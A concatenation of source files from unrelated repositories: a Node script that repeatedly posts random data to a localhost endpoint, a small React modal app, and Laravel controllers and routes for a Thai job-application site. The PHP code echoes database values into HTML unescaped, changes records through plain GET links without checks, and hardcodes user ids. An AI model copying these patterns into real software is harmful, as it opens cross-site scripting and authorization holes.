$scope.menuOptions = [{name:'Comment', callback:todo}];
})
.controller("DocumentMgr", function($scope) {
$scope.modal = {
"title":"Create a new Document",
"import":"",
"saved":true,
}
$scope.conceptSearch = function(query, callback) {
callback(["a","b","c"]);
}
$scope.newDocument = {
"text" : "",
"dependencies" : [],
}
})
<file_sep>/server/makefile
BUILDOPTS=--ghc-options=-O0
all: src/Main.hs
cabal build ${BUILDOPTS}
<file_sep>/server/run.sh
#!/usr/bin/ksh
./dist/build/server/server
|
1424e4dfdc88cd0cb52f248354e7d561f3922756
|
[
"JavaScript",
"Makefile",
"Shell"
] | 3
|
JavaScript
|
johnpmayer/wearelearned
|
3e61c542732d05c9908325ffd625e36c4be2ec6f
|
dc43b02f80e6d1e637e7dec88edd49b73840d5dd
|
refs/heads/master
|
<repo_name>SamirSaji/Api-Hitting-Sender<file_sep>/app.js
const express = require("express");
const app = express();
const bodyparser = require("body-parser");
const axios = require("axios");
app.use(bodyparser.json());
app.post("/", (req, res) => {
res.send("sender page");
});
const posts = async () => {
const generateRandomTex = () => {
let data = {};
for (let i = 0; i < 10; i++) {
let a = Math.random()
.toString(36)
.substr(2, 8);
let b = Math.random()
.toString(36)
.substr(2, 8);
data[`${a}`] = b;
}
return data;
};
await axios({
method: "post",
url: "http://localhost:5000/",
data: generateRandomTex()
})
.then(function(response) {
console.log(response.status);
console.log(response.config.data);
data = {};
})
.catch(function(error) {
console.log(error);
});
};
setInterval(async () => {
const completeLoop = async () => {
for (let i = 0; i < 50; i++) {
await posts();
console.log(
"----------------------------------------------------------------------------------------------"
);
}
};
completeLoop().then(() => {
console.log(
"-------------------------------------------------------------WORK FLOW FINISHED-------------------------------------------"
);
});
}, 5000);
app.listen(3000);
console.log("running sender port 3000");
|
edd9722ae1851ad7ce2ae9585a79da8ef3fd95cd
|
[
"JavaScript"
] | 1
|
JavaScript
|
SamirSaji/Api-Hitting-Sender
|
1903645597cf5be48e63a899eebf02e0e19af5b1
|
8c8b8c884c3c3a227189843d5999548292c862e5
|
refs/heads/master
|
<repo_name>namxg6626/HIT-reactjs<file_sep>/src/App.js
import React from "react";
import { Button, Row, Alert } from "antd";
import { ModalCounter } from "./components";
import "antd/dist/antd.css";
import "./App.css";
export default class App extends React.Component {
state = {
isModalVisible: false,
countValue: null,
};
closeModal = () => {
this.setState({ isModalVisible: false });
};
openModal = () => {
this.setState({ isModalVisible: true });
};
handleOk = (val) => {
this.closeModal();
this.setState({ countValue: val });
};
render() {
return (
<div className="app">
{this.state.isModalVisible && (
<ModalCounter
visible={this.state.isModalVisible}
onOk={(countValue) => this.handleOk(countValue)}
>
<Alert
type="success"
message="Lorem ipsum dolor sit amet consectetur adipisicing elit. Error dolore doloremque laborum dicta vel tempore!"
/>
</ModalCounter>
)}
<Row justify="center">
<Button onClick={() => this.openModal()} type="primary">
Hit me :D !
</Button>
</Row>
<Row justify="center">
{this.state.countValue && <p>Count value: {this.state.countValue}</p>}
</Row>
</div>
);
}
}
|
0cf0d3c75cf93a500d7c0e437f35566fa7372b8b
|
[
"JavaScript"
] | 1
|
JavaScript
|
namxg6626/HIT-reactjs
|
ccc8580746cf7f77241ea02727bdc95c4a16c4cc
|
96562a9e52478c4c369a658b436a5a650119aa75
|
refs/heads/master
|
<file_sep># Git_Test
Git_Test_Repo
<file_sep>
intermidiate work
New changes are made in this file
|
2b34625d11b519e6b32b6995dad933625809107c
|
[
"Markdown",
"C"
] | 2
|
Markdown
|
pradpare/Git_Test
|
cc13c8156e7f78facf914bf0fb7b5a2da2a47a00
|
88706c107b70d0fb3a5a170207f3ff24ce855009
|
refs/heads/master
|
<file_sep><?php
namespace App\Http\Controllers\backend;
use Illuminate\Foundation\Bus\DispatchesJobs;
use Illuminate\Routing\Controller as BaseController;
use Illuminate\Foundation\Validation\ValidatesRequests;
use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
use App\Http\Controllers\Controller;
use Illuminate\Http\Request;
use DB;
use Illuminate\Support\Str;
class AddjobpositionController extends Controller
{
use AuthorizesRequests, DispatchesJobs, ValidatesRequests;
public function insertposition(Request $req)
{
$position_name = (isset($_POST['position_name'])) ? $_POST['position_name'] : '0';
$location = (isset($_POST['location'])) ? $_POST['location'] : '0';
$job_descriptions = (isset($_POST['job_descriptions'])) ? $_POST['job_descriptions'] : '0';
$job_type = (isset($_POST['job_type'])) ? $_POST['job_type'] : '0';
$education = (isset($_POST['education'])) ? $_POST['education'] : '0';
$experiences = (isset($_POST['experiences'])) ? $_POST['experiences'] : '0';
$attributes = (isset($_POST['attributes'])) ? $_POST['attributes'] : '0';
$gender = (isset($_POST['gender'])) ? $_POST['gender'] : '0';
$age = (isset($_POST['age'])) ? $_POST['age'] : '0';
$saraly = (isset($_POST['saraly'])) ? $_POST['saraly'] : '0';
$request = (isset($_POST['request'])) ? $_POST['request'] : '0';
$job_post_date = (isset($_POST['job_post_date'])) ? $_POST['job_post_date'] : '0';
$user_id = $_GET['user_id'];
dd($user_id);
$status = 2 ;
$date_entry = date('Y-m-d');
$data = array(
'position_name' => $position_name,
'location' => $location,
'job_descriptions' => $job_descriptions,
'job_type' => $job_type,
'education' => $education,
'experiences' => $experiences,
'attributes' => $attributes,
'gender' => $gender,
'age' => $age,
'saraly' => $saraly,
'request' => $request,
'job_post_date' => $job_post_date,
'user_id' => $user_id,
'status' => $status,
'date_entry' => $date_entry
);
// dd($data);
$res1 = DB::table('tbl_position')->insert($data);
// dd($res1);
if ($res1){
$msg = " ส่งข้อมูลสำเร็จ";
$url_rediect = "<script>alert('".$msg."'); window.location='jobposition';</script> ";
}else{
$msg = " ส่งข้อมูลไม่สำเร็จ";
$url_rediect = "<script>alert('".$msg."');</script> ";
}
echo $url_rediect;
}
public function addjobpositionindex(Request $req){
// return '<h1>test : '.$user_id.'</h1>';
$user_id=$req->user_id;
// dd($user_id);
$list=$this->prov();
return view('backend.addjobposition',compact(
'list',
'user_id'
));
}
public function jobpositionindex(Request $req){
$list=$this->prov();
$listfile= DB::table('tbl_position')
->select('*')
->whereIn('status',[1,2] )
->get();
return view('backend.jobposition',compact(
'listfile',
'list'
));
}
public function deleteposition(Request $req){
$deleteposition= DB::table('tbl_position')
->where('id', $req->id)
->update(['status' => 3]);
if ($deleteposition){
$msg = " ลบข้อมูลสำเร็จ";
$url_rediect = "<script>alert('".$msg."'); window.location='/jobposition';</script> ";
}else{
$msg = " ลบข้อมูลไม่สำเร็จ";
$url_rediect = "<script>alert('".$msg."');window.location='/jobposition';</script> ";
}
echo $url_rediect;
}
public function changesposition(Request $req){
$status = $req->status;
$id = $req->id;
$date_update = date('Y-m-d');
// dd($date_update);
$updateDetails_1 = [
'status' => '2',
'date_update' => $date_update
];
$updateDetails_2 = [
'status' => '1',
'date_update' => $date_update
];
// dd($status);
if($status == "1") {
$changesposition= DB::table('tbl_position')
->where('id', $req->id)
->where('status', 1)
->update($updateDetails_1);
if ($changesposition){
$msg = " เปลี่ยนสถานะข้อมูลสำเร็จ";
$url_rediect = "<script>alert('".$msg."'); window.location='/jobposition';</script> ";
}else{
$msg = " เปลี่ยนสถานะข้อมูลไม่สำเร็จ";
$url_rediect = "<script>alert('".$msg."');window.location='/jobposition';</script> ";
}
echo $url_rediect;
}
elseif ($status == "2") {
$changesposition= DB::table('tbl_position')
->where('id', $req->id)
->where('status', 2)
->update($updateDetails_2);
if ($changesposition){
$msg = " เปลี่ยนสถานะข้อมูลสำเร็จ";
$url_rediect = "<script>alert('".$msg."'); window.location='/jobposition';</script> ";
}else{
$msg = " เปลี่ยนสถานะข้อมูลไม่สำเร็จ";
$url_rediect = "<script>alert('".$msg."');window.location='/jobposition';</script> ";
}
echo $url_rediect;
}
}
public function prov(){
$list=DB::table('tbl_provinces')
->orderBy('province_name', 'ASC')
->get();
// return view('AEFI.Apps.form1')->with('list',$list);
return $list;
}
public function fetch(Request $request){
$id=$request->get('select');
$result=array();
$query=DB::table('tbl_provinces')
->join('tbl_district','tbl_provinces.province_id','=','tbl_district.province_id')
->select('tbl_district.district_name','tbl_district.district_id','tbl_district.district_code')
->where('tbl_provinces.province_id',$id)
->get();
$output='<option value="%"> อำเภอ </option>';
foreach ($query as $row) {
$output.='<option value="'.$row->district_code.'">'.$row->district_name.'</option>';
}
echo $output;
}
public function fetchD(Request $request){
$idD = $request->select;
// dd($idD);
$resultD=array();
$queryD=DB::table('tbl_subdistricts')
->select('tbl_subdistricts.subdistrict_name','tbl_subdistricts.subdistrict_id','tbl_subdistricts.subdistrict_code')
->where(DB::raw('left(tbl_subdistricts.subdistrict_code, 4)'),'=',$idD)
->get();
$outputD='<option value="%"> ตำบล </option>';
foreach ($queryD as $rowD) {
$outputD.='<option value="'.$rowD->subdistrict_code.'">'.$rowD->subdistrict_name.'</option>';
}
echo $outputD;
}
public function jobpositionajax(Request $req){
$id = $_POST['id'];
// echo $filename;
$result=array();
$query=DB::table('tbl_position')
->select('*')
->where('id', $id )
->get();
foreach ($query as $row) {
$link='<a class="btn btn-danger" href="changesposition/id/'.$row->id.'/status/'.$row->status.'">ยืนยัน</option>';
}
echo $link;
}
public function deletejobpositionajax(Request $req){
$id = $_POST['id'];
// echo $filename;
$result=array();
$query=DB::table('tbl_position')
->select('*')
->where('id', $id )
->get();
foreach ($query as $row) {
$link='<a class="btn btn-danger" href="deleteposition/id/'.$row->id.'">ยืนยัน</option>';
}
echo $link;
}
}
<file_sep><?php
namespace App\Http\Controllers\frontend;
use Illuminate\Foundation\Bus\DispatchesJobs;
use Illuminate\Routing\Controller as BaseController;
use Illuminate\Foundation\Validation\ValidatesRequests;
use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
use Illuminate\Support\Facades\Storage;
use App\Http\Controllers\Controller;
use Illuminate\Http\Request;
use DB;
use Illuminate\Support\Str;
class AttachmentController extends Controller
{
use AuthorizesRequests, DispatchesJobs, ValidatesRequests;
public function uploadFilePost(Request $request){
$a=1;
$file= $request->file('file_name');
$path = Storage::putFile('file_upload', $file);
if($path){
$filename=$file->getClientOriginalName();
// dd($filename);
$user_id = $a;
$title_file_name = (isset($_POST['title_file_name'])) ? $_POST['title_file_name'] : '0';
$filenamegenerate=str_replace("file_upload/" ,"", $path);
$file_type=strstr($filename, ".");
$filename = $filename;
$originalfilename = $filename;
$path = $path;
$status = $a;
$date_entry = date('Y-m-d');
$date_update = date('Y-m-d');
$data = array(
'user_id' => $user_id,
'title_file_name' => $title_file_name,
'filename' => $filenamegenerate,
'file_type' => $file_type,
'originalfilename' => $originalfilename,
'path' => $path,
'status' => $status,
'date_entry' => $date_entry,
'date_update' => $date_update
);
// dd($data);
$res1 = DB::table('tbl_file_upload')->insert($data);
// dd($res1);
if ($res1){
$msg = " ส่งข้อมูลสำเร็จ";
$url_rediect = "<script>alert('".$msg."'); window.location='attachment';</script> ";
}else{
$msg = " ส่งข้อมูลไม่สำเร็จ";
$url_rediect = "<script>alert('".$msg."');</script> ";
}
echo $url_rediect;
}
}
public function attachmentindex(Request $req){
$listfile= DB::table('tbl_file_upload')
->select('*')
->where('user_id', '1' )
->where('status', '1')
->get();
return view('frontend.attachment',compact(
'listfile'
));
}
public function deletefile(Request $req){
$filename = $req->filename;
$status = $req->status;
$date_update = date('Y-m-d');
// dd($date_update);
$updateDetails_1 = [
'status' => '2',
'date_update' => $date_update
];
$deletefile= DB::table('tbl_file_upload')
->where('filename', $req->filename)
->update($updateDetails_1);
if ($deletefile){
$msg = " ลบข้อมูลสำเร็จ";
$url_rediect = "<script>alert('".$msg."'); window.location='/attachment';</script> ";
}else{
$msg = " ลบข้อมูลไม่สำเร็จ";
$url_rediect = "<script>alert('".$msg."');window.location='/attachment';</script> ";
}
echo $url_rediect;
}
public function attachmentajax(Request $req){
$filename = $_POST['filename'];
// echo $filename;
$result=array();
$query=DB::table('tbl_file_upload')
->select('*')
->where('filename', $filename )
->get();
foreach ($query as $row) {
$link='<a class="btn btn-danger" href="deletefile/filename/'.$row->filename.'/status/'.$row->status.'">ยืนยัน</a>';
}
echo $link;
}
}
<file_sep><?php
namespace App\Http\Controllers\frontend;
use Illuminate\Foundation\Bus\DispatchesJobs;
use Illuminate\Routing\Controller as BaseController;
use Illuminate\Foundation\Validation\ValidatesRequests;
use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
use App\Http\Controllers\Controller;
use Illuminate\Http\Request;
use DB;
use Illuminate\Support\Str;
class JobappliedController extends Controller
{
use AuthorizesRequests, DispatchesJobs, ValidatesRequests;
public function jobapplied(Request $req){
$listjobapplied = DB::table('tbl_select_job')
->join('tbl_position', 'tbl_select_job.position_id', '=', 'tbl_position.id')
->select('tbl_select_job.id',
'tbl_select_job.position_id',
'tbl_select_job.user_id',
'tbl_select_job.status',
'tbl_position.position_name',
'tbl_position.job_descriptions',
'tbl_position.saraly',
'tbl_position.position_name'
)
->where('tbl_select_job.status', '1')
->get();
return view('frontend.jobapplied',compact(
'listjobapplied'
));
}
public function jobapplieddelete(Request $req){
$jobapplieddelete= DB::table('tbl_select_job')
->where('id', $req->id)
->update(['status' => 2]);
if ($jobapplieddelete){
$msg = " ลบข้อมูลสำเร็จ";
$url_rediect = "<script>alert('".$msg."'); window.location='/jobapplied';</script> ";
}else{
$msg = " ลบข้อมูลไม่สำเร็จ";
$url_rediect = "<script>alert('".$msg."');window.location='/jobapplied';</script> ";
}
echo $url_rediect;
}
public function deletejobappliedajax(Request $req){
$id = $_POST['id'];
// echo $id;
// exit;
$result=array();
$query=DB::table('tbl_position')
->select('*')
->where('id', $id )
->get();
// echo $query;
// exit;
foreach ($query as $row) {
$link='<a class="btn btn-danger" href="jobapplieddelete/id/'.$row->id.'">ยืนยัน</option>';
}
echo $link;
}
}
<file_sep><?php
namespace App\Http\Controllers\apps;
use Illuminate\Foundation\Bus\DispatchesJobs;
use Illuminate\Routing\Controller as BaseController;
use Illuminate\Foundation\Validation\ValidatesRequests;
use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
use Illuminate\Support\Facades\Storage;
use App\Http\Controllers\Controller;
use Illuminate\Http\Request;
use DB;
use Illuminate\Support\Str;
class testController extends Controller
{
use AuthorizesRequests, DispatchesJobs, ValidatesRequests;
public function test(Request $req){
$listfile= DB::table('tbl_file_upload')
->select('*')
->where('user_id', '1' )
->where('status', '1')
->get();
return view('apps.test',compact(
'listfile'
));
}
public function testajax(Request $req){
$id = $_POST['id'];
echo $id;
}
}
<file_sep><?php
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
Route::get('/', 'frontend\JobavailableController@jobavailableindex')->name('/');
Route::post('/jobavailableajax', 'frontend\JobavailableController@jobavailableajax')->name('/jobavailableajax');
Route::get('insertjobavailable/user_id/{user_id}/position_id/{position_id}/status/{status}', 'frontend\JobavailableController@insertjobavailable')->name('insertjobavailable');
// function insert tbl_resume
Route::get('/resume', 'frontend\ResumeController@resumeindex')->name('resume');
Route::post('/insertdataresume', 'frontend\ResumeController@insertresume')->name('insertdataresume');
Route::post('/resume/fetch', 'frontend\ResumeController@fetch')->name('dropdown.fetch');
Route::post('/resume/fetchD', 'frontend\ResumeController@fetchD')->name('dropdown.fetchD');
// attachment
Route::get('/attachment', 'frontend\AttachmentController@attachmentindex')->name('attachment');
Route::post('/attachment/attachmentajax', 'frontend\AttachmentController@attachmentajax')->name('/attachment/attachmentajax');
Route::post('/uploadfile', 'frontend\AttachmentController@uploadFilePost')->name('uploadfile');
Route::get('/deletefile/filename/{filename}/status/{status}', 'frontend\AttachmentController@deletefile')->name('deletefile');
// Jobapplied
Route::get('/jobapplied', 'frontend\JobappliedController@jobapplied')->name('jobapplied');
Route::post('jobapplied/deletejobappliedajax', 'frontend\JobappliedController@deletejobappliedajax')->name('jobapplied/deletejobappliedajax');
Route::get('/jobapplieddelete/id/{id}', 'frontend\JobappliedController@jobapplieddelete')->name('jobapplieddelete');
// backend session
// addjobposition
Route::get('addjobposition/user_id/{user_id}', 'backend\AddjobpositionController@addjobpositionindex')->name('addjobposition');
// Route::get('addjobposition/user_id/{user_id}', function ($user_id) {
// return 'addjobposition '.$user_id;
// });
Route::post('/insertposition', 'backend\AddjobpositionController@insertposition')->name('insertposition');
Route::get('/jobposition', 'backend\AddjobpositionController@jobpositionindex')->name('jobposition');
Route::post('/jobposition/jobpositionajax', 'backend\AddjobpositionController@jobpositionajax')->name('jobposition/jobpositionajax');
Route::post('/jobposition/deletejobpositionajax', 'backend\AddjobpositionController@deletejobpositionajax')->name('jobposition/deletejobpositionajax');
Route::get('/deleteposition/id/{id}', 'backend\AddjobpositionController@deleteposition')->name('deleteposition');
Route::get('/changesposition/id/{id}/status/{status}', 'backend\AddjobpositionController@changesposition')->name('changesposition');
Auth::routes();
Route::get('/home', 'HomeController@index')->name('home');
<file_sep><?php
namespace App\Http\Controllers\frontend;
use Illuminate\Foundation\Bus\DispatchesJobs;
use Illuminate\Routing\Controller as BaseController;
use Illuminate\Foundation\Validation\ValidatesRequests;
use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
use App\Http\Controllers\Controller;
use Illuminate\Http\Request;
use DB;
use Illuminate\Support\Str;
class JobavailableController extends Controller
{
/**
* Create a new controller instance.
*
* @return void
*/
public function __construct()
{
$this->middleware('auth');
}
/**
* Show the application dashboard.
*
* @return \Illuminate\Contracts\Support\Renderable
*/
public function insertjobavailable(Request $req)
{
$user_id = $req->user_id;
// dd($user_id);
$position_id = $req->position_id;
$status = $req->status;
$date_entry = date('Y-m-d');
$date_update = date('Y-m-d');
$data = array(
'user_id' => $user_id,
'position_id' => $position_id,
'status' => $status,
'date_entry' => $date_entry,
'date_update' => $date_update
);
// dd($data);
$res1 = DB::table('tbl_select_job')->insert($data);
// dd($res1);
if ($res1){
$msg = " ส่งข้อมูลสำเร็จ";
$url_rediect = "<script>alert('".$msg."'); window.location='/#job-available-section';</script> ";
}else{
$msg = " ส่งข้อมูลไม่สำเร็จ";
$url_rediect = "<script>alert('".$msg."');</script> ";
}
echo $url_rediect;
}
public function jobavailableindex(Request $req){
auth()->user()->assignRole('user');
$list=$this->prov();
$jobavailabledata = DB::select('select * FROM tbl_position WHERE status = "1"' );
$listfile= DB::table('tbl_position')
->select('*')
->whereIn('status',[1] )
->get();
return view('frontend.index',compact(
'jobavailabledata',
'listfile',
'list'
));
}
public function prov(){
$list=DB::table('tbl_provinces')
->orderBy('province_name', 'ASC')
->get();
// return view('AEFI.frontend.form1')->with('list',$list);
return $list;
}
public function fetch(Request $request){
$id=$request->get('select');
$result=array();
$query=DB::table('tbl_provinces')
->join('tbl_district','tbl_provinces.province_id','=','tbl_district.province_id')
->select('tbl_district.district_name','tbl_district.district_id','tbl_district.district_code')
->where('tbl_provinces.province_id',$id)
->get();
$output='<option value="%"> อำเภอ </option>';
foreach ($query as $row) {
$output.='<option value="'.$row->district_code.'">'.$row->district_name.'</option>';
}
echo $output;
}
public function fetchD(Request $request){
$idD = $request->select;
// dd($idD);
$resultD=array();
$queryD=DB::table('tbl_subdistricts')
->select('tbl_subdistricts.subdistrict_name','tbl_subdistricts.subdistrict_id','tbl_subdistricts.subdistrict_code')
->where(DB::raw('left(tbl_subdistricts.subdistrict_code, 4)'),'=',$idD)
->get();
$outputD='<option value="%"> ตำบล </option>';
foreach ($queryD as $rowD) {
$outputD.='<option value="'.$rowD->subdistrict_code.'">'.$rowD->subdistrict_name.'</option>';
}
echo $outputD;
}
public function jobavailableajax(Request $req){
$id = $_POST['id'];
// echo $filename;
$result=array();
$query=DB::table('tbl_position')
->select('*')
->where('id', $id )
->get();
foreach ($query as $row) {
$link='<p class="lead">Job Descriptions :</p>
<p class="text-muted mb-4">'
.$row->job_descriptions.
'</p>
<p class="lead">Education :</p>
<p class="text-muted mb-4">'
.$row->education.
'</p>
<p class="lead">Experiences :</p>
<p class="text-muted mb-4">'
.$row->experiences.
'</p>
<p class="lead">Attributes :</p>
<p class="text-muted mb-4">'
.$row->attributes.
'</p>
<p class="lead">Gender :</p>
<p class="text-muted mb-4">'
.$row->gender.
'</p>
<p class="lead">Age :</p>
<p class="text-muted mb-4">'
.$row->age.
'</p>
<p class="lead">Saraly :</p>
<p class="text-muted mb-4">'
.$row->saraly.
'</p>
<p class="lead">Job Post Date :</p>
<p class="text-muted mb-4">'
.$row->job_post_date.
'</p>
<div class="modal-footer">
<a class="btn btn-danger" href="insertjobavailable/user_id/'.$row->id.'/position_id/'.$row->id.'/status/'.$row->status.'">ยืนยัน</a>
<button type="button" class="btn btn-primary" data-dismiss="modal">Close</button>
</div>';
}
echo $link;
}
}
<file_sep><?php
namespace App\Http\Controllers\frontend;
use Illuminate\Foundation\Bus\DispatchesJobs;
use Illuminate\Routing\Controller as BaseController;
use Illuminate\Foundation\Validation\ValidatesRequests;
use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
use App\Http\Controllers\Controller;
use Illuminate\Http\Request;
use DB;
use Illuminate\Support\Str;
class ResumeController extends Controller
{
use AuthorizesRequests, DispatchesJobs, ValidatesRequests;
public function insertresume(Request $req)
{
$user_id = (isset($_POST['user_id '])) ? $_POST['user_id'] : '0';
$year_of_applied = (isset($_POST['year_of_applied'])) ? $_POST['year_of_applied'] : '0';
$date_of_applied = (isset($_POST['date_of_applied'])) ? $_POST['date_of_applied'] : '0';
$number_of_applied = (isset($_POST['number_of_applied'])) ? $_POST['number_of_applied'] : '0';
$position_of_applied = (isset($_POST['position_of_applied'])) ? $_POST['position_of_applied'] : '0';
$applied_announcement = (isset($_POST['applied_announcement'])) ? $_POST['applied_announcement'] : '0';
$title_name = (isset($_POST['title_name'])) ? $_POST['title_name'] : '0';
$first_name_th = (isset($_POST['first_name_th'])) ? $_POST['first_name_th'] : '0';
$last_name_th = (isset($_POST['last_name_th'])) ? $_POST['last_name_th'] : '0';
$first_name_en = (isset($_POST['first_name_en'])) ? $_POST['first_name_en'] : '0';
$last_name_en = (isset($_POST['last_name_en'])) ? $_POST['last_name_en'] : '0';
$gendar = (isset($_POST['gendar'])) ? $_POST['gendar'] : '0';
$date_birth = (isset($_POST['date_birth'])) ? $_POST['date_birth'] : '0';
$province_birth = (isset($_POST['province_birth'])) ? $_POST['province_birth'] : '0';
$district_birth = (isset($_POST['district_birth'])) ? $_POST['district_birth'] : '0';
$subdistrict_birth = (isset($_POST['subdistrict_birth'])) ? $_POST['subdistrict_birth'] : '0';
$nationality = (isset($_POST['nationality'])) ? $_POST['nationality'] : '0';
$religion = (isset($_POST['religion'])) ? $_POST['religion'] : '0';
$military_service = (isset($_POST['military_service'])) ? $_POST['military_service'] : '0';
$blood_type = (isset($_POST['blood_type'])) ? $_POST['blood_type'] : '0';
$congenital_disease = (isset($_POST['congenital_disease'])) ? $_POST['congenital_disease'] : '0';
$congenital_disease_text = (isset($_POST['congenital_disease_text'])) ? $_POST['congenital_disease_text'] : '0';
$id_card_number = (isset($_POST['id_card_number'])) ? $_POST['id_card_number'] : '0';
$id_card_expiration_date = (isset($_POST['id_card_expiration_date'])) ? $_POST['id_card_expiration_date'] : '0';
$id_card_issue_date = (isset($_POST['id_card_issue_date'])) ? $_POST['id_card_issue_date'] : '0';
$province_id_card_issue = (isset($_POST['province_id_card_issue'])) ? $_POST['province_id_card_issue'] : '0';
$location_id_card_issue = (isset($_POST['location_id_card_issue'])) ? $_POST['location_id_card_issue'] : '0';
$passport_no = (isset($_POST['passport_no'])) ? $_POST['passport_no'] : '0';
$passport_expired_date = (isset($_POST['passport_expired_date'])) ? $_POST['passport_expired_date'] : '0';
$passport_issued_date = (isset($_POST['passport_issued_date'])) ? $_POST['passport_issued_date'] : '0';
$visa_no = (isset($_POST['visa_no'])) ? $_POST['visa_no'] : '0';
$type_of_visa = (isset($_POST['type_of_visa'])) ? $_POST['type_of_visa'] : '0';
$visa_issue_date = (isset($_POST['visa_issued_date'])) ? $_POST['visa_issued_date'] : '0';
$visa_expired_date = (isset($_POST['visa_expired_date'])) ? $_POST['visa_expired_date'] : '0';
$work_permit_no = (isset($_POST['work_permit_no'])) ? $_POST['work_permit_no'] : '0';
$work_permit_expired_date = (isset($_POST['work_permit_expired_date'])) ? $_POST['work_permit_expired_date'] : '0';
$work_permit_issue_date = (isset($_POST['work_permit_issue_date'])) ? $_POST['work_permit_issue_date'] : '0';
$marital_status = (isset($_POST['marital_status'])) ? $_POST['marital_status'] : '0';
$spouse_first_name = (isset($_POST['spouse_first_name'])) ? $_POST['spouse_first_name'] : '0';
$spouse_last_name = (isset($_POST['spouse_last_name'])) ? $_POST['spouse_last_name'] : '0';
$spouse_career = (isset($_POST['spouse_career'])) ? $_POST['spouse_career'] : '0';
$spouse_career_location = (isset($_POST['spouse_career_location'])) ? $_POST['spouse_career_location'] : '0';
$number_of_children = (isset($_POST['number_of_children'])) ? $_POST['number_of_children'] : '0';
$writing = (isset($_POST['writing'])) ? $_POST['writing'] : '0';
$ability_level = (isset($_POST['ability_level'])) ? $_POST['ability_level'] : '0';
$local_language = (isset($_POST['local_language'])) ? $_POST['local_language'] : '0';
$computer_knowledge = (isset($_POST['computer_knowledge'])) ? $_POST['computer_knowledge'] : '0';
$programs_be_used = (isset($_POST['programs_be_used'])) ? $_POST['programs_be_used'] : '0';
$other_special_abilities = (isset($_POST['other_special_abilities'])) ? $_POST['other_special_abilities'] : '0';
$hobbies = (isset($_POST['hobbies'])) ? $_POST['hobbies'] : '0';
$toefl_paper = (isset($_POST['toefl_paper'])) ? $_POST['toefl_paper'] : '0';
$toefl_cbt = (isset($_POST['toefl_cbt'])) ? $_POST['toefl_cbt'] : '0';
$toefl_cbt_compare_score = (isset($_POST['toefl_cbt_compare_score'])) ? $_POST['toefl_cbt_compare_score'] : '0';
$toefl_ibt = (isset($_POST['toefl_ibt'])) ? $_POST['toefl_ibt'] : '0';
$ielts = (isset($_POST['ielts'])) ? $_POST['ielts'] : '0';
$ielts_compare_score = (isset($_POST['ielts_compare_score'])) ? $_POST['ielts_compare_score'] : '0';
$cu_tep = (isset($_POST['cu_tep'])) ? $_POST['cu_tep'] : '0';
$career = (isset($_POST['career'])) ? $_POST['career'] : '0';
$position = (isset($_POST['position'])) ? $_POST['position'] : '0';
$affiliation = (isset($_POST['affiliation'])) ? $_POST['affiliation'] : '0';
$career_start_date = (isset($_POST['career_start_date'])) ? $_POST['career_start_date'] : '0';
$career_ended_date = (isset($_POST['career_ended_date'])) ? $_POST['career_ended_date'] : '0';
$salary = (isset($_POST['salary'])) ? $_POST['salary'] : '0';
$date_entry = date('Y-m-d');
$data = array(
'user_id' => $user_id,
'year_of_applied' => $year_of_applied,
'date_of_applied' => $date_of_applied,
'number_of_applied' => $number_of_applied,
'position_of_applied' => $position_of_applied,
'applied_announcement' => $applied_announcement,
'title_name' => $title_name,
'first_name_th' => $first_name_th,
'last_name_th' => $last_name_th,
'first_name_en' => $first_name_en,
'last_name_en' => $last_name_en,
'gendar' => $gendar,
'date_birth' => $date_birth,
'province_birth' => $province_birth,
'district_birth' => $district_birth,
'subdistrict_birth' => $subdistrict_birth,
'nationality' => $nationality,
'religion' => $religion,
'military_service' => $military_service,
'blood_type' => $blood_type,
'congenital_disease' => $congenital_disease,
'congenital_disease_text' => $congenital_disease_text,
'id_card_number' => $id_card_number,
'id_card_expiration_date' => $id_card_expiration_date,
'id_card_issue_date' => $id_card_issue_date,
'province_id_card_issue' => $province_id_card_issue,
'location_id_card_issue' => $location_id_card_issue,
'passport_no' => $passport_no,
'passport_expired_date' => $passport_expired_date,
'passport_issued_date' => $passport_issued_date,
'visa_no' => $visa_no,
'type_of_visa' => $type_of_visa,
'visa_issue_date' => $visa_issue_date,
'visa_expired_date' => $visa_expired_date,
'work_permit_no' => $work_permit_no,
'work_permit_expired_date' => $work_permit_expired_date,
'work_permit_issue_date' => $work_permit_issue_date,
'marital_status' => $marital_status,
'spouse_first_name' => $spouse_first_name,
'spouse_last_name' => $spouse_last_name,
'spouse_career' => $spouse_career,
'spouse_career_location' => $spouse_career_location,
'number_of_children' => $number_of_children,
'writing' => $writing,
'ability_level' => $ability_level,
'local_language' => $local_language,
'computer_knowledge' => $computer_knowledge,
'programs_be_used' => $programs_be_used,
'other_special_abilities' => $other_special_abilities,
'hobbies' => $hobbies,
'toefl_paper' => $toefl_paper,
'toefl_cbt' => $toefl_cbt,
'toefl_cbt_compare_score' => $toefl_cbt_compare_score,
'toefl_ibt' => $toefl_ibt,
'ielts' => $ielts,
'ielts_compare_score' => $ielts_compare_score,
'cu_tep' => $cu_tep,
'career' => $career,
'position' => $position,
'affiliation' => $affiliation,
'career_start_date' => $career_start_date,
'career_ended_date' => $career_ended_date,
'salary' => $salary,
'date_entry' => $date_entry
);
// dd($data);
$res1 = DB::table('tbl_resume')->insert($data);
// dd($res1);
if ($res1){
$msg = " ส่งข้อมูลสำเร็จ";
$url_rediect = "<script>alert('".$msg."'); window.location='jobapplied';</script> ";
}else{
$msg = " ส่งข้อมูลไม่สำเร็จ";
$url_rediect = "<script>alert('".$msg."');</script> ";
}
echo $url_rediect;
}
public function resumeindex(Request $req){
$list=$this->prov();
return view('frontend.resume',compact(
'list'
));
}
public function prov(){
$list=DB::table('tbl_provinces')
->orderBy('province_name', 'ASC')
->get();
// return view('AEFI.frontend.form1')->with('list',$list);
return $list;
}
public function fetch(Request $request){
$id=$request->get('select');
$result=array();
$query=DB::table('tbl_provinces')
->join('tbl_district','tbl_provinces.province_id','=','tbl_district.province_id')
->select('tbl_district.district_name','tbl_district.district_id','tbl_district.district_code')
->where('tbl_provinces.province_id',$id)
->get();
$output='<option value="%"> อำเภอ </option>';
foreach ($query as $row) {
$output.='<option value="'.$row->district_code.'">'.$row->district_name.'</option>';
